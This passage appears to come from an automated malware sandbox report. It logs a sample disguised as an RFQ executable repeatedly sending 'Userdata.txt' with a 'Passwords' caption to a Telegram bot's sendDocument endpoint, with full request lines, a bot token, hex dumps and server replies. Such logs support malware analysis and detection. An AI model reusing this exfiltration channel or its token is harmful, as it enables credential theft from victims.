                                                                                                          2024-12-18 08:52:05 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 31 37 35 35 30 38 39 65 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd1f1755089ed1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:05 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:05 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:05 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38680,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511925,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.449758149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:08 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd1f411f1efb9f
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-18 08:52:08 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 34 31 31 66 31 65 66 62 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd1f411f1efb9fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:09 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:09 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:09 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38681,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511929,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.449769149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:12 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd1f66828e4af0
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2024-12-18 08:52:12 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 36 36 38 32 38 65 34 61 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd1f66828e4af0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:12 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:12 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:12 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38682,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511932,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.449777149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:15 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd1f8bafdfa933
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-18 08:52:15 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 38 62 61 66 64 66 61 39 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd1f8bafdfa933Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:16 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:16 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:16 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38683,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511936,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.449788149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:19 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd1fb779480112
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2024-12-18 08:52:19 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 62 37 37 39 34 38 30 31 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd1fb779480112Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:19 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:19 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:19 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38684,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511939,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.449800149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:23 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd1fdee6004ffa
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2024-12-18 08:52:23 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 64 65 65 36 30 30 34 66 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd1fdee6004ffaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:23 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:23 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:23 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38685,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511943,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.449812149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:27 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd200a1dff2dce
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2024-12-18 08:52:27 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 30 61 31 64 66 66 32 64 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd200a1dff2dceContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2024-12-18 08:52:27 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 18 Dec 2024 08:52:27 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-12-18 08:52:27 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 31 31 39 34 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":38686,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1734511947,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.449819149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:30 UTC271OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd202fb14aa943
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
